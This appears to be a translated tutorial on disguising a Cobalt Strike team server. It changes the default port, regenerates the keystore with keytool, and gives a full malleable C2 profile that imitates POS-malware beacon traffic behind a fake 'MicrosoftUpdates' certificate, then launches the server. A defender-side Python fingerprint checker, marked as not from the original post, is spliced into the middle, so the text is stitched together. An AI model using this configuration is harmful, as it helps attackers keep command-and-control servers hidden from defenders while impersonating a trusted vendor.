Introduction:
Many tools have recognisable characteristics. Scanners such as sqlmap and AWVS, for example, are easily blocked by a WAF while scanning, and a Cobalt Strike team server that does not hide its own characteristics is identified as soon as it comes online.
Here we hide those characteristics in three ways: changing the default port, replacing the SSL certificate, and modifying the C2 profile.
Here I use Cobalt Strike 4.0.
1. Modify the default port
vim teamserver
The port is set on the last line of the file. The default is 50050; change it to any port that suits the situation.
I changed it here to 10000.
2. Replace the SSL certificate
keytool is the Java certificate and key management tool.
It stores keys and certificates in a file called a keystore, i.e. the file with the .store suffix.
keytool commands:
- certreq Generate certificate request
- changealias Change the alias of an entry
- delete Delete entry
- exportcert Export certificate
- genkeypair Generate key pair
- genseckey Generate secret key
- gencert Generate certificate based on certificate request
- importcert Import certificate or certificate chain
- importpass Import password
- importkeystore Import one or all entries from another keystore
- keypasswd Change key password for entry
- list List entries in the keystore
- printcert Print certificate content
- printcertreq Print the contents of the certificate request
- printcrl Print the contents of the CRL file
- storepasswd Change the password stored in the keystore
View Certificate:
keytool -list -v -keystore cobaltstrike.store
The default password is 123456
You can see that both the alias and the certificate owner carry Cobalt Strike characteristics.
The default owner is:
CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth
To change them, generate a new keystore and certificate:
keytool -genkey -alias ling -keyalg RSA -validity 36500 -keystore ling.store
View Certificate:
keytool -list -v -keystore ling.store
Migrate the keystore to the PKCS12 format:
keytool -importkeystore -srckeystore ./ling.store -destkeystore ./ling.store -deststoretype pkcs12
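As an added defender-side example (not code from the original post), the following Python script parses the text printed by keytool -list -v and reports which owner fields of a certificate still carry the default Cobalt Strike subject shown above. The two listings it scans are constructed samples, and the alias check assumes the stock alias contains the string "cobaltstrike".

```python
import re

# Default owner of the stock cobaltstrike.store certificate, as quoted on this page.
CS_DEFAULT_DN = ("CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, "
                 "L=Somewhere, ST=Cyberspace, C=Earth")

def parse_dn(dn: str) -> dict:
    """Split an X.500 DN string into {attribute: value}."""
    pairs = {}
    for part in dn.split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            pairs[key.strip().upper()] = value.strip()
    return pairs

def parse_keytool_list(text: str) -> list:
    """Collect alias and owner DN for each entry printed by `keytool -list -v`."""
    entries, current = [], None
    for line in text.splitlines():
        m = re.match(r"\s*Alias name:\s*(.+)", line)
        if m:
            current = {"alias": m.group(1).strip(), "owner": ""}
            entries.append(current)
        m = re.match(r"\s*Owner:\s*(.+)", line)
        if m and current is not None:
            current["owner"] = m.group(1).strip()
    return entries

def default_cs_indicators(entry: dict) -> list:
    """Return the owner RDNs (and alias) of an entry that still match the CS defaults."""
    default, owner = parse_dn(CS_DEFAULT_DN), parse_dn(entry["owner"])
    hits = [f"{k}={v}" for k, v in owner.items() if default.get(k) == v]
    if "cobaltstrike" in entry["alias"].lower():  # assumed: stock alias names the product
        hits.append(f"alias={entry['alias']}")
    return hits

def scan(text: str) -> dict:
    """Map each alias in a keytool listing to its list of default-fingerprint hits."""
    return {e["alias"]: default_cs_indicators(e) for e in parse_keytool_list(text)}

# Constructed sample listings (not captured output): the stock keystore and the replaced one.
SAMPLE_DEFAULT = """Alias name: cobaltstrike
Owner: CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth
"""
SAMPLE_REPLACED = """Alias name: ling
Owner: CN=US, OU=MicrosoftUpdates, O=MicrosoftUpdates, L=US, ST=US, C=en
"""
if __name__ == "__main__":
    for name, text in (("stock", SAMPLE_DEFAULT), ("replaced", SAMPLE_REPLACED)):
        print(name, scan(text))
```

Feeding it the real output of keytool -list -v against a team server's keystore shows at a glance whether any of the default subject fields survived the replacement.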
3. Modify the C2 profile
Create and modify C2 profile file:
vi c2.profile
The file name is arbitrary.
The set keystore, set password and set alias values in the code-signer block must match the keystore generated in step 2.
set sample_name "C2 POS Malware";
set sleeptime "5000";   # 5 s between callbacks
set jitter "10";        # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";

# certificate used for the HTTPS listener
https-certificate {
    set CN "US";
    set O "MicrosoftUpdates";
    set C "en";
    set L "US";
    set OU "MicrosoftUpdates";
    set ST "US";
    set validity "365";
}

# code-signing keystore (the one generated in step 2)
code-signer {
    set keystore "ling.store";
    set password "159357";
    set alias "ling";
}

# IP address returned to a DNS beacon when no tasks are waiting
set dns_idle "8.8.4.4";
# forced sleep time before each individual DNS request
set dns_sleep "0";
# maximum hostname length when uploading data through DNS [0-255]
set maxdns "235";

http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urlencoded";
        id {
            netbios;
            parameter "id";
        }
        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }
    server {
        output {
            print;
        }
    }
}

http-get {
    set uri "/updates";
    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "text/plain";
        output {
            base64;
            print;
        }
    }
}
Use c2lint to check that the profile is valid:
./c2lint c2.profile
If the check fails, the error is printed in red.
4. Run the team server and go online
./teamserver 192.168.100.142 123123 ling.store
The team server comes online successfully.